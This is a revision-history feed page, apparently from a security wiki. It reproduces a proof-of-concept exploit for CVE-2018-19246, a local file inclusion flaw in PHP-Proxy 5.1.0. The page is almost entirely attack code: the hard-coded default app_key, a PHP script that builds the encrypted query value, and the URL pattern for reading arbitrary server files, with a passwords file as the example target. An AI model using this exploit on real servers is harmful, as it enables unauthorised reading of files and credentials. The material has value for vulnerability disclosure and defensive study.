https://pwnwiki.com/index.php?action=history&feed=atom&title=CVE-2018-19246_PHP-Proxy_5.1.0%E6%9C%AC%E5%9C%B0%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E
CVE-2018-19246 PHP-Proxy 5.1.0本地文件包含漏洞 - Revision history
2026-04-13T19:49:42Z
Revision history for this page on the wiki
MediaWiki 1.35.1
https://pwnwiki.com/index.php?title=CVE-2018-19246_PHP-Proxy_5.1.0%E6%9C%AC%E5%9C%B0%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E&diff=672&oldid=prev
Pwnwiki: Created page with "==POC== <pre> # Exploit Title: PHP-Proxy 5.1.0 - Local File Inclusion # Date: 2018-11-13 # Exploit Author: Ameer Pornillos # Contact: https://ethicalhackers.club # Vendor Home..."
2021-03-27T02:33:14Z
<p>Created page with "==POC== <pre> # Exploit Title: PHP-Proxy 5.1.0 - Local File Inclusion # Date: 2018-11-13 # Exploit Author: Ameer Pornillos # Contact: https://ethicalhackers.club # Vendor Home..."</p>
<p><b>New page</b></p><div>==POC==<br />
<pre><br />
# Exploit Title: PHP-Proxy 5.1.0 - Local File Inclusion<br />
# Date: 2018-11-13<br />
# Exploit Author: Ameer Pornillos<br />
# Contact: https://ethicalhackers.club<br />
# Vendor Homepage: https://www.php-proxy.com/<br />
# Software Link: https://www.php-proxy.com/download/php-proxy.zip<br />
# Version: 5.1.0<br />
# Category: Webapps<br />
# Tested on: XAMPP on Win10_x64<br />
# Description: Downloadable pre-installed version of PHP-Proxy 5.1.0<br />
# make use of a default app_key wherein can be used for local file inclusion<br />
# attacks. This can be used to generate encrypted string which<br />
# can gain access to arbitrary local files in the server.<br />
# http://php-proxy-site/index.php?q=[encrypted_string_value]<br />
# CVE: CVE-2018-19246<br />
<br />
# POC:<br />
# 1)<br />
# Generate encrypted string value using the PHP script below<br />
# 2)<br />
# Browse to URL<br />
# http://php-proxy-site/index.php?q=[encrypted_string_value]<br />
# to read local file<br />
<br />
<?php<br />
$file = "file:///C:/xampp/passwords.txt"; //example target file to read<br />
$ip = "192.168.0.1"; //change depending on your IP address that access the app<br />
$app_key = "aeb067ca0aa9a3193dce3a7264c90187";<br />
$key = md5($app_key.$ip);<br />
function str_rot_pass($str, $key, $decrypt = false){<br />
$key_len = strlen($key);<br />
$result = str_repeat(' ', strlen($str));<br />
for($i=0; $i<strlen($str); $i++){<br />
if($decrypt){<br />
$ascii = ord($str[$i]) - ord($key[$i % $key_len]);<br />
} else {<br />
$ascii = ord($str[$i]) + ord($key[$i % $key_len]);<br />
}<br />
$result[$i] = chr($ascii);<br />
}<br />
return $result;<br />
}<br />
function base64_url_encode($input){<br />
return rtrim(strtr(base64_encode($input), '+/', '-_'), '=');<br />
}<br />
echo base64_url_encode(str_rot_pass($file, $key));<br />
?> <br />
</pre></div>
Pwnwiki